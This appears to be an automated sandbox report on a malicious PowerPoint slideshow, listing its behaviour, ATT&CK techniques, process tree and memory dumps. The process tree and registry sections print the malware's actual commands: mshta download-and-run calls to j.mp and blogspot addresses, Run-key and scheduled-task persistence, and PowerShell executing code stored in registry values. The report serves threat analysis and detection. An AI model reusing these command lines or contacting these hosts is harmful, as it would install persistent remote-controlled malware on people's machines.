3e837fe40cee5e3aebd0e060fc575adeee8a65799162b8f16abbe48054eb752d

General

Target

0a05b3c30c42b87df3944f1bcdba0db6884734641220790bc86909de80ebfdde.pps
Size

140KB
MD5

aef3c7aa3a68afaa0b1a3540b0952b52
SHA1

01c7fe4b25a0dbc5dd6aa2a24817284859a44aaa
SHA256

0a05b3c30c42b87df3944f1bcdba0db6884734641220790bc86909de80ebfdde
SHA512

1e0576913519310281d3fad4d623209e7d5ac3e731d0348f46413a7cfc853be891b753d8a2474a97c5d902abbb947550e0e7765a2cc44e6d93a540bc2ebae269

Score

10^/10

persistence

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mSHtA.exeping.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	636	1144	mSHtA.exe	POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3568	1144	ping.exe	POWERPNT.EXE

Blocklisted process makes network request 9 IoCs

Processes:

mSHtA.exePowershell.exe

flow pid process

29 636 mSHtA.exe
31 636 mSHtA.exe
33 636 mSHtA.exe
35 636 mSHtA.exe
36 636 mSHtA.exe
39 636 mSHtA.exe
40 636 mSHtA.exe
44 636 mSHtA.exe
49 504 Powershell.exe

flow	pid	process
29	636	mSHtA.exe
31	636	mSHtA.exe
33	636	mSHtA.exe
35	636	mSHtA.exe
36	636	mSHtA.exe
39	636	mSHtA.exe
40	636	mSHtA.exe
44	636	mSHtA.exe
49	504	Powershell.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mSHtA.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)\|IEX\"\", 0 : window.close\")"	mSHtA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/35.html\"\", 0 : window.close\")"	mSHtA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p/35.html\"\", 0 : window.close\")"	mSHtA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).btfee)\|IEX\"\", 0 : window.close\")"	mSHtA.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run	mSHtA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\rednufed = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).Defunder)\|IEX\"\", 0 : window.close\")"	mSHtA.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1536 636 WerFault.exe mSHtA.exe

pid	pid_target	process	target process
1536	636	WerFault.exe	mSHtA.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXEwinword.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winword.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3480 schtasks.exe

pid	process
3480	schtasks.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXEwinword.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	winword.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	winword.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2228 taskkill.exe
1900 taskkill.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

ping.exe

pid process

3568 ping.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

POWERPNT.EXEwinword.exe

pid process

1144 POWERPNT.EXE
2972 winword.exe

pid	process
2228	taskkill.exe
1900	taskkill.exe

pid	process
3568	ping.exe

pid	process
1144	POWERPNT.EXE
2972	winword.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

Processes:

WerFault.exePowershell.exePowershell.exe

pid	process
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
1536	WerFault.exe
504	Powershell.exe
2272	Powershell.exe
2272	Powershell.exe
504	Powershell.exe
2272	Powershell.exe
504	Powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exeWerFault.exetaskkill.exePowershell.exePowershell.exe

description	pid	process
Token: SeDebugPrivilege	1900	taskkill.exe
Token: SeDebugPrivilege	1536	WerFault.exe
Token: SeDebugPrivilege	2228	taskkill.exe
Token: SeDebugPrivilege	504	Powershell.exe
Token: SeDebugPrivilege	2272	Powershell.exe
Token: SeIncreaseQuotaPrivilege	504	Powershell.exe
Token: SeSecurityPrivilege	504	Powershell.exe
Token: SeTakeOwnershipPrivilege	504	Powershell.exe
Token: SeLoadDriverPrivilege	504	Powershell.exe
Token: SeSystemProfilePrivilege	504	Powershell.exe
Token: SeSystemtimePrivilege	504	Powershell.exe
Token: SeProfSingleProcessPrivilege	504	Powershell.exe
Token: SeIncBasePriorityPrivilege	504	Powershell.exe
Token: SeCreatePagefilePrivilege	504	Powershell.exe
Token: SeBackupPrivilege	504	Powershell.exe
Token: SeRestorePrivilege	504	Powershell.exe
Token: SeShutdownPrivilege	504	Powershell.exe
Token: SeDebugPrivilege	504	Powershell.exe
Token: SeSystemEnvironmentPrivilege	504	Powershell.exe
Token: SeRemoteShutdownPrivilege	504	Powershell.exe
Token: SeUndockPrivilege	504	Powershell.exe
Token: SeManageVolumePrivilege	504	Powershell.exe
Token: 33	504	Powershell.exe
Token: 34	504	Powershell.exe
Token: 35	504	Powershell.exe
Token: 36	504	Powershell.exe
Token: SeIncreaseQuotaPrivilege	2272	Powershell.exe
Token: SeSecurityPrivilege	2272	Powershell.exe
Token: SeTakeOwnershipPrivilege	2272	Powershell.exe
Token: SeLoadDriverPrivilege	2272	Powershell.exe
Token: SeSystemProfilePrivilege	2272	Powershell.exe
Token: SeSystemtimePrivilege	2272	Powershell.exe
Token: SeProfSingleProcessPrivilege	2272	Powershell.exe
Token: SeIncBasePriorityPrivilege	2272	Powershell.exe
Token: SeCreatePagefilePrivilege	2272	Powershell.exe
Token: SeBackupPrivilege	2272	Powershell.exe
Token: SeRestorePrivilege	2272	Powershell.exe
Token: SeShutdownPrivilege	2272	Powershell.exe
Token: SeDebugPrivilege	2272	Powershell.exe
Token: SeSystemEnvironmentPrivilege	2272	Powershell.exe
Token: SeRemoteShutdownPrivilege	2272	Powershell.exe
Token: SeUndockPrivilege	2272	Powershell.exe
Token: SeManageVolumePrivilege	2272	Powershell.exe
Token: 33	2272	Powershell.exe
Token: 34	2272	Powershell.exe
Token: 35	2272	Powershell.exe
Token: 36	2272	Powershell.exe
Token: SeIncreaseQuotaPrivilege	504	Powershell.exe
Token: SeSecurityPrivilege	504	Powershell.exe
Token: SeTakeOwnershipPrivilege	504	Powershell.exe
Token: SeLoadDriverPrivilege	504	Powershell.exe
Token: SeSystemProfilePrivilege	504	Powershell.exe
Token: SeSystemtimePrivilege	504	Powershell.exe
Token: SeProfSingleProcessPrivilege	504	Powershell.exe
Token: SeIncBasePriorityPrivilege	504	Powershell.exe
Token: SeCreatePagefilePrivilege	504	Powershell.exe
Token: SeBackupPrivilege	504	Powershell.exe
Token: SeRestorePrivilege	504	Powershell.exe
Token: SeShutdownPrivilege	504	Powershell.exe
Token: SeDebugPrivilege	504	Powershell.exe
Token: SeSystemEnvironmentPrivilege	504	Powershell.exe
Token: SeRemoteShutdownPrivilege	504	Powershell.exe
Token: SeUndockPrivilege	504	Powershell.exe
Token: SeManageVolumePrivilege	504	Powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

POWERPNT.EXEwinword.exe

pid process

1144 POWERPNT.EXE
2972 winword.exe
2972 winword.exe
2972 winword.exe
1144 POWERPNT.EXE

pid	process
1144	POWERPNT.EXE
2972	winword.exe
2972	winword.exe
2972	winword.exe
1144	POWERPNT.EXE

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

POWERPNT.EXEmSHtA.exe

description	pid	process	target process
PID 1144 wrote to memory of 636	1144	POWERPNT.EXE	mSHtA.exe
PID 1144 wrote to memory of 636	1144	POWERPNT.EXE	mSHtA.exe
PID 1144 wrote to memory of 3568	1144	POWERPNT.EXE	ping.exe
PID 1144 wrote to memory of 3568	1144	POWERPNT.EXE	ping.exe
PID 1144 wrote to memory of 2972	1144	POWERPNT.EXE	winword.exe
PID 1144 wrote to memory of 2972	1144	POWERPNT.EXE	winword.exe
PID 636 wrote to memory of 3480	636	mSHtA.exe	schtasks.exe
PID 636 wrote to memory of 3480	636	mSHtA.exe	schtasks.exe
PID 636 wrote to memory of 1900	636	mSHtA.exe	taskkill.exe
PID 636 wrote to memory of 1900	636	mSHtA.exe	taskkill.exe
PID 636 wrote to memory of 504	636	mSHtA.exe	Powershell.exe
PID 636 wrote to memory of 504	636	mSHtA.exe	Powershell.exe
PID 636 wrote to memory of 504	636	mSHtA.exe	Powershell.exe
PID 636 wrote to memory of 2228	636	mSHtA.exe	taskkill.exe
PID 636 wrote to memory of 2228	636	mSHtA.exe	taskkill.exe
PID 636 wrote to memory of 2272	636	mSHtA.exe	Powershell.exe
PID 636 wrote to memory of 2272	636	mSHtA.exe	Powershell.exe
PID 636 wrote to memory of 2272	636	mSHtA.exe	Powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\0a05b3c30c42b87df3944f1bcdba0db6884734641220790bc86909de80ebfdde.pps" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1144

C:\Windows\SYSTEM32\mSHtA.exe
mSHtA http://12384928198391823%12384928198391823@j.mp/akawdowadkwnduhand
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:636

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2228

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 636 -s 3124
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:504

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/35.html""\"", 0 : window.close"\")
3⤵
- Creates scheduled task(s)
PID:3480

C:\Windows\SYSTEM32\ping.exe
ping
2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:3568

C:\Program Files\Microsoft Office\Root\Office16\winword.exe
winword
2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2972

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc

SHA1
75c07243f9cb80a9c7aed2865f9c5192cc920e7e

SHA256
91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

SHA512
db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

Download Submit
memory/504-51-0x000000000A6E0000-0x000000000A6E1000-memory.dmp

Filesize
4KB

Download
memory/504-39-0x0000000008740000-0x0000000008741000-memory.dmp

Filesize
4KB

Download
memory/504-55-0x000000000B790000-0x000000000B791000-memory.dmp

Filesize
4KB

Download
memory/504-30-0x0000000004EF2000-0x0000000004EF3000-memory.dmp

Filesize
4KB

Download
memory/504-31-0x00000000078B0000-0x00000000078B1000-memory.dmp

Filesize
4KB

Download
memory/504-54-0x000000000AC10000-0x000000000AC11000-memory.dmp

Filesize
4KB

Download
memory/504-49-0x000000000A5D0000-0x000000000A5D1000-memory.dmp

Filesize
4KB

Download
memory/504-47-0x000000000A640000-0x000000000A641000-memory.dmp

Filesize
4KB

Download
memory/504-45-0x0000000009870000-0x0000000009871000-memory.dmp

Filesize
4KB

Download
memory/504-44-0x0000000008D00000-0x0000000008D01000-memory.dmp

Filesize
4KB

Download
memory/504-23-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/504-22-0x0000000073B00000-0x00000000741EE000-memory.dmp

Filesize
6.9MB

Download
memory/504-17-0x0000000000000000-mapping.dmp

Download
memory/504-63-0x0000000004EF3000-0x0000000004EF4000-memory.dmp

Filesize
4KB

Download
memory/504-28-0x0000000004EF0000-0x0000000004EF1000-memory.dmp

Filesize
4KB

Download
memory/636-7-0x0000000000000000-mapping.dmp

Download
memory/1144-6-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp

Filesize
64KB

Download
memory/1144-3-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp

Filesize
64KB

Download
memory/1144-62-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp

Filesize
64KB

Download
memory/1144-4-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp

Filesize
64KB

Download
memory/1144-61-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp

Filesize
64KB

Download
memory/1144-60-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp

Filesize
64KB

Download
memory/1144-59-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp

Filesize
64KB

Download
memory/1144-58-0x00007FFE1FFF0000-0x00007FFE21BCD000-memory.dmp

Filesize
27.9MB

Download
memory/1144-5-0x00007FFE1F9B0000-0x00007FFE1FFE7000-memory.dmp

Filesize
6.2MB

Download
memory/1144-2-0x00007FFDFD230000-0x00007FFDFD240000-memory.dmp

Filesize
64KB

Download
memory/1536-20-0x0000024527F20000-0x0000024527F21000-memory.dmp

Filesize
4KB

Download
memory/1900-16-0x0000000000000000-mapping.dmp

Download
memory/2228-18-0x0000000000000000-mapping.dmp

Download
memory/2272-33-0x00000000078A0000-0x00000000078A1000-memory.dmp

Filesize
4KB

Download
memory/2272-29-0x0000000005272000-0x0000000005273000-memory.dmp

Filesize
4KB

Download
memory/2272-19-0x0000000000000000-mapping.dmp

Download
memory/2272-26-0x0000000007AE0000-0x0000000007AE1000-memory.dmp

Filesize
4KB

Download
memory/2272-41-0x0000000008AD0000-0x0000000008AD1000-memory.dmp

Filesize
4KB

Download
memory/2272-57-0x000000000A960000-0x000000000A961000-memory.dmp

Filesize
4KB

Download
memory/2272-37-0x00000000082B0000-0x00000000082B1000-memory.dmp

Filesize
4KB

Download
memory/2272-35-0x0000000007A40000-0x0000000007A41000-memory.dmp

Filesize
4KB

Download
memory/2272-25-0x0000000005270000-0x0000000005271000-memory.dmp

Filesize
4KB

Download
memory/2272-21-0x0000000073B00000-0x00000000741EE000-memory.dmp

Filesize
6.9MB

Download
memory/2972-9-0x0000000000000000-mapping.dmp

Download
memory/2972-13-0x00007FFE1F9B0000-0x00007FFE1FFE7000-memory.dmp

Filesize
6.2MB

Download
memory/3480-15-0x0000000000000000-mapping.dmp

Download
memory/3568-8-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads